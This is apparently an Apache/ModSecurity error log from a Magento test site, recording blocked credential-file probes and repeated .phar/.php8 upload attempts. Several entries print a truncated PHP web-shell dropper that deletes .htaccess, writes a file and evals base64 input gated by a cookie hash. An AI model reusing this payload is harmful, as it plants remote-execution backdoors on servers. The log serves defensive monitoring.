[Tue Mar 03 00:31:09.144643 2026] [:error] [pid 2440212] [client 195.178.110.33:36998] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aaYdvWQsrWXPFOBtQAdzNAAAAAE"]
[Tue Mar 03 00:31:25.163225 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aaYdzXKpPFQwL8r802j_hwAAAAI"]
[Tue Mar 03 00:31:25.163531 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aaYdzXKpPFQwL8r802j_hwAAAAI"]
[Tue Mar 03 00:31:25.163754 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aaYdzXKpPFQwL8r802j_hwAAAAI"]
[Tue Mar 03 00:31:25.231858 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aaYdzXKpPFQwL8r802j_igAAAAI"]
[Tue Mar 03 00:31:25.232045 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aaYdzXKpPFQwL8r802j_igAAAAI"]
[Tue Mar 03 00:31:25.232199 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aaYdzXKpPFQwL8r802j_igAAAAI"]
[Tue Mar 03 00:31:25.668196 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aaYdzXKpPFQwL8r802j_lAAAAAI"]
[Tue Mar 03 00:31:25.668420 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aaYdzXKpPFQwL8r802j_lAAAAAI"]
[Tue Mar 03 00:31:25.668593 2026] [:error] [pid 2439851] [client 195.178.110.33:44864] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aaYdzXKpPFQwL8r802j_lAAAAAI"]
[Thu Mar 05 15:59:16.773214 2026] [:error] [pid 2488037] [client 89.239.157.171:51670] [client 89.239.157.171] ModSecurity: Rule 7fd0f83f9be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aamaRAg5UFm-BuLxsSflXgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 05 15:59:16.774423 2026] [:error] [pid 2488037] [client 89.239.157.171:51670] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aamaRAg5UFm-BuLxsSflXgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 05 15:59:16.775866 2026] [:error] [pid 2488037] [client 89.239.157.171:51670] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aamaRAg5UFm-BuLxsSflXgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 05 15:59:16.776019 2026] [:error] [pid 2488037] [client 89.239.157.171:51670] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.phar"] [unique_id "aamaRAg5UFm-BuLxsSflXgAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 05 15:59:17.002328 2026] [:error] [pid 2488037] [client 89.239.157.171:51670] [client 89.239.157.171] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: tr88364f428d25.php8 found within FILES:custom_attributes[country_id]: tr88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aamaRQg5UFm-BuLxsSflXwAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/r/tr88364f428d25.phar
[Thu Mar 05 15:59:17.002794 2026] [:error] [pid 2488037] [client 89.239.157.171:51670] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aamaRQg5UFm-BuLxsSflXwAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/r/tr88364f428d25.phar
[Thu Mar 05 15:59:17.002955 2026] [:error] [pid 2488037] [client 89.239.157.171:51670] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aamaRQg5UFm-BuLxsSflXwAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/r/tr88364f428d25.phar
[Thu Mar 05 15:59:43.081840 2026] [:error] [pid 2488375] [client 89.239.157.171:60074] [client 89.239.157.171] ModSecurity: Rule 7fd0f83f9be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aamaX-4Rz1XVoAyx9CKFzQAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 05 15:59:43.082183 2026] [:error] [pid 2488375] [client 89.239.157.171:60074] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aamaX-4Rz1XVoAyx9CKFzQAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 05 15:59:43.083655 2026] [:error] [pid 2488375] [client 89.239.157.171:60074] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aamaX-4Rz1XVoAyx9CKFzQAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Mar 05 15:59:43.083799 2026] [:error] [pid 2488375] [client 89.239.157.171:60074] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/r/tr88364f428d25.php8"] [unique_id "aamaX-4Rz1XVoAyx9CKFzQAAAAw"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Mar 06 21:57:06.490884 2026] [authz_core:error] [pid 2509803] [client 118.193.37.170:49540] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: http://autumnus.test.indacotrentino.com/app/
[Fri Mar 06 21:57:14.118011 2026] [authz_core:error] [pid 2509803] [client 118.193.37.170:49540] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: http://autumnus.test.indacotrentino.com/app/
[Fri Mar 06 21:57:17.045929 2026] [authz_core:error] [pid 2509803] [client 118.193.37.170:49540] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/js, referer: http://autumnus.test.indacotrentino.com/app/js/base.js
[Fri Mar 06 21:57:26.564582 2026] [authz_core:error] [pid 2526061] [client 118.193.37.170:49568] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: http://autumnus.test.indacotrentino.com/app/static/js/download.js
[Fri Mar 06 21:57:27.624687 2026] [authz_core:error] [pid 2526063] [client 118.193.37.170:49584] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: http://autumnus.test.indacotrentino.com/app/static/picture/star.png
[Fri Mar 06 21:57:33.035707 2026] [authz_core:error] [pid 2526063] [client 118.193.37.170:49584] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: https://autumnus.test.indacotrentino.com/app/
[Fri Mar 06 21:57:35.295920 2026] [authz_core:error] [pid 2509774] [client 118.193.37.170:49556] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/, referer: https://autumnus.test.indacotrentino.com/app/
[Fri Mar 06 21:57:36.640392 2026] [authz_core:error] [pid 2526066] [client 118.193.37.170:49602] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/js, referer: https://autumnus.test.indacotrentino.com/app/js/base.js
[Fri Mar 06 21:57:41.730186 2026] [authz_core:error] [pid 2526065] [client 118.193.37.170:49574] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: https://autumnus.test.indacotrentino.com/app/static/js/download.js
[Fri Mar 06 21:57:42.262910 2026] [authz_core:error] [pid 2526061] [client 118.193.37.170:49568] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/static, referer: https://autumnus.test.indacotrentino.com/app/static/picture/star.png
[Sat Mar 07 11:32:50.196955 2026] [php:error] [pid 2530093] [client 20.220.232.240:9166] script '/var/www/magento.test.indacotrentino.com/www/pub/images/Mhbgf.php' not found or unable to stat
[Sat Mar 07 14:42:05.800149 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Rule 7fdad14bebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.phar"] [unique_id "aawrLaZMpHjtpPWB_zsfNgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Mar 07 14:42:05.800496 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.phar"] [unique_id "aawrLaZMpHjtpPWB_zsfNgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Mar 07 14:42:05.802023 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.phar"] [unique_id "aawrLaZMpHjtpPWB_zsfNgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Mar 07 14:42:05.802181 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.phar"] [unique_id "aawrLaZMpHjtpPWB_zsfNgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Mar 07 14:42:06.173983 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: fu88364f428d25.php8 found within FILES:custom_attributes[country_id]: fu88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aawrLqZMpHjtpPWB_zsfNwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/u/fu88364f428d25.phar
[Sat Mar 07 14:42:06.174458 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aawrLqZMpHjtpPWB_zsfNwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/u/fu88364f428d25.phar
[Sat Mar 07 14:42:06.174599 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aawrLqZMpHjtpPWB_zsfNwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/u/fu88364f428d25.phar
[Sat Mar 07 14:42:06.620326 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Rule 7fdad14bebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.php8"] [unique_id "aawrLqZMpHjtpPWB_zsfOAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Mar 07 14:42:06.620651 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.php8"] [unique_id "aawrLqZMpHjtpPWB_zsfOAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Mar 07 14:42:06.622089 2026] [:error] [pid 2530090] [client 89.250.174.71:15069] [client 89.250.174.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/u/fu88364f428d25.php8"] [unique_id "aawrLqZMpHjtpPWB_zsfOAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
